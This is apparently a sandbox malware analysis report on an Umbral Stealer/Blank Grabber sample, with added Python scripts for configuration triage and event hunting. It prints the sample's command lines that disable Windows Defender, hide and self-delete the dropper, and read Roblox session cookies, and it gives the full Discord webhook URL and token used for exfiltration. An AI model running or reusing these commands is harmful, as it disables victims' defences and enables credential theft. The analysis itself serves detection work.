
Windows Analysis Report
zamPeEkHWr.exe

Overview

General Information

Sample name: zamPeEkHWr.exe (renamed because original name is a hash value)
Original sample name: 824d0e2ebaa40b7bca3bc0657338a13df78121172fe52e604f45c8033ab7537a.exe
Analysis ID: 1488036
MD5: ef323a7483653ffb1fc4ff036576e065
SHA1: 80e63b57a7ad6394f778c7aa5a855520f1533589
SHA256: 824d0e2ebaa40b7bca3bc0657338a13df78121172fe52e604f45c8033ab7537a
Tags: exe

Detection

Blank Grabber, Umbral Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • zamPeEkHWr.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\zamPeEkHWr.exe" MD5: EF323A7483653FFB1FC4FF036576E065)
    • WMIC.exe (PID: 7520 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7592 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\zamPeEkHWr.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7644 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7800 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7888 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8008 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6980 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7740 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 3980 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7736 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7672 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 3052 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6724 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 5868 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
{"C2 url": "https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL", "Version": "v1.3"}
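The configuration line above is the whole output of the extractor: a Discord webhook on the Public Test Build host (ptb.discord.com) and a version string. What follows is an added example (my code, not Joe Sandbox's extractor and not Umbral Stealer's) that turns that line into something actionable: it splits the webhook URL into its numeric ID and token, recovers the webhook's creation time from the ID (Discord snowflakes store milliseconds since 2015-01-01 UTC in their upper 42 bits), and emits a path-based block indicator instead of a host, because discord.com is legitimate traffic on most networks. The host allowlist, the regex and the output field names are my choices. The 404 "Unknown Webhook" (code 10015) recorded in the Networking section below means the webhook had already been deleted when the sample ran, so the exfiltration POST failed; the creation date tells you how long the webhook was live before that.

```python
"""Triage of the Umbral Stealer configuration printed in this report.
Added example: the parsing helpers are mine, not Joe Sandbox's."""
import json
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit

# Extracted configuration exactly as the report prints it.
CONFIG_JSON = ('{"C2 url": "https://ptb.discord.com/api/webhooks/1193833046810566716/'
               'Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL", '
               '"Version": "v1.3"}')

DISCORD_EPOCH_MS = 1420070400000  # 2015-01-01T00:00:00Z, Discord's snowflake epoch
# Hosts that serve the Discord API (assumption: list chosen by me, extend as needed).
DISCORD_API_HOSTS = {"discord.com", "ptb.discord.com", "canary.discord.com", "discordapp.com"}
WEBHOOK_RE = re.compile(r"^/api/(?:v\d+/)?webhooks/(?P<id>\d{17,20})/(?P<token>[A-Za-z0-9_\-]+)$")


def parse_webhook(url):
    """Return {'host', 'id', 'token'} for a Discord webhook URL, else None.
    Rejects plain http and non-Discord hosts so a lookalike domain is not
    mistaken for the real API."""
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.hostname not in DISCORD_API_HOSTS:
        return None
    m = WEBHOOK_RE.match(parts.path)
    if not m:
        return None
    return {"host": parts.hostname, "id": int(m["id"]), "token": m["token"]}


def snowflake_to_datetime(snowflake):
    """Creation time encoded in a Discord snowflake (top 42 bits = ms since epoch)."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms // 1000, tz=timezone.utc)


def triage_config(config_json):
    """Build the indicator set an analyst would hand to blocking and hunting."""
    cfg = json.loads(config_json)
    hook = parse_webhook(cfg["C2 url"])
    if hook is None:
        raise ValueError("C2 is not a Discord webhook; treat as a generic URL")
    created = snowflake_to_datetime(hook["id"])
    return {
        "family_version": cfg.get("Version"),
        "c2_host": hook["host"],
        "webhook_id": hook["id"],
        "webhook_created_utc": created.strftime("%Y-%m-%d %H:%M:%S"),
        # Block on the path: the host is shared with legitimate Discord use.
        "block_path": f"/api/webhooks/{hook['id']}/",
        # Keep only a prefix of the token in tickets; the full value is a credential.
        "token_fingerprint": hook["token"][:8] + "...",
    }


if __name__ == "__main__":
    for k, v in triage_config(CONFIG_JSON).items():
        print(f"{k}: {v}")
```

The creation timestamp is the one piece of information the report does not show: it dates the operator's infrastructure independently of the sample's compile time, which is useful when the binary carries a forged timestamp (this report flags "Binary contains a suspicious time stamp").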
Yara matches (initial sample):
  • Source: zamPeEkHWr.exe, Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Author: Joe Security
  • Source: zamPeEkHWr.exe, Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Author: Joe Security
  • Source: zamPeEkHWr.exe, Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Author: ditekSHen, Strings:
      0x30fe4:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      0x3116a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      0x31206:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Yara matches (dropped files):
  • Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Author: Joe Security
  • Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Author: Joe Security
  • Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Author: ditekSHen, Strings:
      0x30fe4:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      0x3116a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      0x31206:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Yara matches (memory dumps):
  • Source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Author: Joe Security
  • Source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Author: Joe Security
  • Source: 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Author: Joe Security
  • Source: 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Author: Joe Security
  • Source: Process Memory Space: zamPeEkHWr.exe PID: 7396, Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Author: Joe Security
  (2 further entries are collapsed in the original report and not reproduced here)

Yara matches (unpacked PEs):
  • Source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Author: Joe Security
  • Source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Author: Joe Security
  • Source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Author: ditekSHen, Strings:
      0x30fe4:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      0x3116a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      0x31206:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

                        System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zamPeEkHWr.exe", ParentImage: C:\Users\user\Desktop\zamPeEkHWr.exe, ParentProcessId: 7396, ParentProcessName: zamPeEkHWr.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', ProcessId: 7644, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zamPeEkHWr.exe", ParentImage: C:\Users\user\Desktop\zamPeEkHWr.exe, ParentProcessId: 7396, ParentProcessName: zamPeEkHWr.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 7888, ProcessName: powershell.exe
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\zamPeEkHWr.exe, ProcessId: 7396, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\kaS9T.scr
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zamPeEkHWr.exe", ParentImage: C:\Users\user\Desktop\zamPeEkHWr.exe, ParentProcessId: 7396, ParentProcessName: zamPeEkHWr.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', ProcessId: 7644, ProcessName: powershell.exe
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\Desktop\zamPeEkHWr.exe, ProcessId: 7396, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\kaS9T.scr
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\zamPeEkHWr.exe, ProcessId: 7396, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\kaS9T.scr
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\Desktop\zamPeEkHWr.exe, ProcessId: 7396, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\kaS9T.scr
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zamPeEkHWr.exe", ParentImage: C:\Users\user\Desktop\zamPeEkHWr.exe, ParentProcessId: 7396, ParentProcessName: zamPeEkHWr.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', ProcessId: 7644, ProcessName: powershell.exe
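The Sigma matches above and the process tree in the Classification section describe one host-side chain: an exclusion for the dropper, Defender's engines switched off, attrib +h +s on the dropper, a .scr written to the all-users Startup folder, and a ping-delayed self-delete. The following Python is an added example (my code, not Joe Sandbox's signatures and not the Sigma rules they reference) that runs equivalent checks over Sysmon-style process-create and file-create events and then scores the combination, because any single check (an Add-MpPreference exclusion in particular) also fires on legitimate administration. The event dicts are constructed to mirror this report's process tree; they are not a real log export. Field names follow Sysmon's schema; the tag names and the regexes are mine.

```python
"""Hunting checks for the host-side chain recorded in this report.
Added example: my code, not Joe Sandbox's or the Sigma rules'."""
import re

# Sysmon-style events CONSTRUCTED from the report's process tree (not a real export).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 7644, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "\"powershell.exe\" Add-MpPreference -ExclusionPath 'C:\\Users\\user\\Desktop\\zamPeEkHWr.exe'"},
    {"EventID": 1, "ProcessId": 7888, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "\"powershell.exe\" Set-MpPreference -DisableIntrusionPreventionSystem $true "
                    "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true "
                    "-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force "
                    "-MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference "
                    "-SubmitSamplesConsent 2"},
    {"EventID": 1, "ProcessId": 7592, "Image": "C:\\Windows\\System32\\attrib.exe",
     "CommandLine": "\"attrib.exe\" +h +s \"C:\\Users\\user\\Desktop\\zamPeEkHWr.exe\""},
    {"EventID": 1, "ProcessId": 6724, "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "\"cmd.exe\" /c ping localhost && del /F /A h \"C:\\Users\\user\\Desktop\\zamPeEkHWr.exe\" && pause"},
    {"EventID": 11, "ProcessId": 7396, "Image": "C:\\Users\\user\\Desktop\\zamPeEkHWr.exe",
     "TargetFilename": "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\kaS9T.scr"},
    # Benign control: reading Defender settings must not fire.
    {"EventID": 1, "ProcessId": 9001, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "\"powershell.exe\" Get-MpPreference | Select-Object ExclusionPath"},
]

# Add-/Set-MpPreference that adds an exclusion, disables an engine, or mutes cloud reporting.
DEFENDER_TAMPER = re.compile(
    r"(?:Add|Set)-MpPreference\b.*?(?:-Exclusion(?:Path|Process|Extension)\b"
    r"|-Disable\w+\s+\$?true\b|-MAPSReporting\s+Disabled\b|-SubmitSamplesConsent\s+(?:NeverSend|2)\b)",
    re.IGNORECASE | re.DOTALL)
# attrib setting hidden and/or system on a file.
HIDE_FILE = re.compile(r'\battrib(?:\.exe)?"?\s+(?:\+[hs]\s+)*\+[hs]\b', re.IGNORECASE)
# Executable-type file written to a Startup folder (user or all-users).
STARTUP_DROP = re.compile(
    r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:exe|scr|dll|bat|cmd|vbs|js|ps1|hta|lnk)$",
    re.IGNORECASE)
# ping used as a sleep, followed by del: the classic self-delete stub.
SELF_DELETE = re.compile(r"\bping\b[^&]*&&\s*del\b", re.IGNORECASE)

REQUIRED_CHAIN = {"defender_tamper", "startup_persistence", "self_delete"}


def classify(event):
    """Return the behaviour tags one event triggers (empty list if none)."""
    tags = []
    if event.get("EventID") == 1:
        cmd = event.get("CommandLine", "")
        if DEFENDER_TAMPER.search(cmd):
            tags.append("defender_tamper")
        if HIDE_FILE.search(cmd):
            tags.append("hide_file")
        if SELF_DELETE.search(cmd):
            tags.append("self_delete")
    elif event.get("EventID") == 11:
        if STARTUP_DROP.search(event.get("TargetFilename", "")):
            tags.append("startup_persistence")
    return tags


def triage(events):
    """Map ProcessId -> sorted tags, keeping only processes that fired something."""
    hits = {}
    for ev in events:
        for tag in classify(ev):
            hits.setdefault(ev["ProcessId"], set()).add(tag)
    return {pid: sorted(tags) for pid, tags in hits.items()}


def chain_complete(hits):
    """True when defence evasion, autorun persistence and self-deletion all
    appear in the same session: an admin adding an exclusion does not also
    drop a .scr into Startup and delete the tool that did it."""
    seen = {t for tags in hits.values() for t in tags}
    return REQUIRED_CHAIN <= seen


if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for pid, tags in sorted(hits.items()):
        print(pid, tags)
    print("full chain:", chain_complete(hits))
```

Note that STARTUP_DROP matches both "Startup" and "StartUp" (the report itself spells the path both ways) because the search is case-insensitive, and that the .scr extension is included deliberately: Explorer treats screensavers as executables, which is why the Sigma "Suspicious Screensaver Binary File Creation" rule fired here.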
Timestamp: 2024-08-05T15:44:50.851858+0200
SID: 2045593
Source Port: 49740
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-08-05T15:44:27.256131+0200
SID: 2803305
Source Port: 49738
Destination Port: 80
Protocol: TCP
Classtype: Unknown Traffic


                        AV Detection

Source: zamPeEkHWr.exe; Avira: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr; Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: zamPeEkHWr.exe; Malware Configuration Extractor: Umbral Stealer {"C2 url": "https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL", "Version": "v1.3"}
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr; ReversingLabs: Detection: 81%
Source: zamPeEkHWr.exe; ReversingLabs: Detection: 81%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr; Joe Sandbox ML: detected
Source: zamPeEkHWr.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\zamPeEkHWr.exe; Code function: 0_2_00007FFD9BA3300D CryptUnprotectData, 0_2_00007FFD9BA3300D
Source: C:\Users\user\Desktop\zamPeEkHWr.exe; Code function: 0_2_00007FFD9BA336AE CryptUnprotectData, 0_2_00007FFD9BA336AE
Source: zamPeEkHWr.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE (the 32BIT_MACHINE flag next to the 64-bit code addresses above is consistent with a .NET AnyCPU assembly being run as x64, as Umbral Stealer is a C# project)
Source: unknown; HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: zamPeEkHWr.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

Source: Malware configuration extractor; URLs: https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping localhost
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1, Host: ip-api.com
Source: Joe Sandbox View; IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View; IP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox View; ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; DNS query: name: ip-api.com
Source: unknown; DNS query: name: ip-api.com
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1, Host: ip-api.com
Source: global traffic; DNS traffic detected: DNS query: ip-api.com
Source: global traffic; DNS traffic detected: DNS query: ptb.discord.com
Source: unknown; HTTP traffic detected:
    POST /api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL HTTP/1.1
    Accept: application/json
    User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
    Content-Type: application/json; charset=utf-8
    Host: ptb.discord.com
    Content-Length: 940
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Mon, 05 Aug 2024 13:44:50 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: close
    set-cookie: __dcfduid=e33ff842533011efbe60b67178f48d0e; Expires=Sat, 04-Aug-2029 13:44:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1722865492
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2BBBAmd1RrIzFLhMO%2FwUWja0FGraiAvZGXlrwzS2KQ53MD0Lgp4EP3CjS%2FtWQOs%2FYbSjtsPUYOKa07FSNWu1ss1eQYbjL5UQLrbSzehFLb%2FnfOo09q2D2J42vggM0O9VNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
